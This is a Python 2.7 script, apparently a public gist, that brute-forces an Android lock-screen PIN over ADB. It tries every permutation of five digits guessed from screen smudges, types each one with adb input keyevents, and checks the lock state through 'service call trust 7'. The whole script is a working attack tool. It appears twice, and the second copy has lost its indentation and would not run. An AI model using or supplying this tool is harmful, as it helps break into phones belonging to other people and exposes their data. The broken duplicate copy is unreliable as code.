Areizen/smudge_attack_adb.py

## smudge_attack_adb.py
#!/usr/bin/python2.7
# coding: utf8

import subprocess
import time
import itertools as it
import commands
import sys

base_command = "adb shell "

def unlock_splash():
    first_command = base_command + "input keyevent 82"
    second_command = base_command + "input swipe 407 1211 378 85"
    subprocess.call(first_command.split(' '))
    subprocess.call(second_command.split(' '))

def type_pin(pin):
    print("[*] Trying : %s" % "".join(pin))
    for i in pin :
        command = base_command + " input keyevent " + str(int(i) + 7)
        print( "Command : " + command )
        subprocess.call(command.split(' '))
    last_command = base_command + "input keyevent 66"
    subprocess.call(last_command.split(' '))

def generate_combinations(columns):
    result = list(it.permutations(columns))
    return result

def check_lock(i):
    command_check = "service call trust 7"
    res =  commands.getoutput(base_command + command_check)
    print(res)
    if(not '1' in res):
        print("[+] Found the pin code : " + "".join(i))
        sys.exit(0)

if __name__ == '__main__':

    # Keys pressed
    all_columns =  ["1","3","6","9","0"]
    combinations = generate_combinations(all_columns)

    print("[-] Number of tries : " + str(len(combinations)))
    print("[-] Time max to find the code: " + str((len(combinations)*(30+10))/3600))

    old = combinations[0]
    for i in combinations :
        unlock_splash()
        type_pin(i)
        check_lock(old)
        old = i
        time.sleep(30)
	#!/usr/bin/python2.7
	# coding: utf8

	import subprocess
	import time
	import itertools as it
	import commands
	import sys

	base_command = "adb shell "

	def unlock_splash():
	first_command = base_command + "input keyevent 82"
	second_command = base_command + "input swipe 407 1211 378 85"
	subprocess.call(first_command.split(' '))
	subprocess.call(second_command.split(' '))

	def type_pin(pin):
	print("[*] Trying : %s" % "".join(pin))
	for i in pin :
	command = base_command + " input keyevent " + str(int(i) + 7)
	print( "Command : " + command )
	subprocess.call(command.split(' '))
	last_command = base_command + "input keyevent 66"
	subprocess.call(last_command.split(' '))

	def generate_combinations(columns):
	result = list(it.permutations(columns))
	return result

	def check_lock(i):
	command_check = "service call trust 7"
	res = commands.getoutput(base_command + command_check)
	print(res)
	if(not '1' in res):
	print("[+] Found the pin code : " + "".join(i))
	sys.exit(0)

	if __name__ == '__main__':

	# Keys pressed
	all_columns = ["1","3","6","9","0"]
	combinations = generate_combinations(all_columns)

	print("[-] Number of tries : " + str(len(combinations)))
	print("[-] Time max to find the code: " + str((len(combinations)*(30+10))/3600))

	old = combinations[0]
	for i in combinations :
	unlock_splash()
	type_pin(i)
	check_lock(old)
	old = i
	time.sleep(30)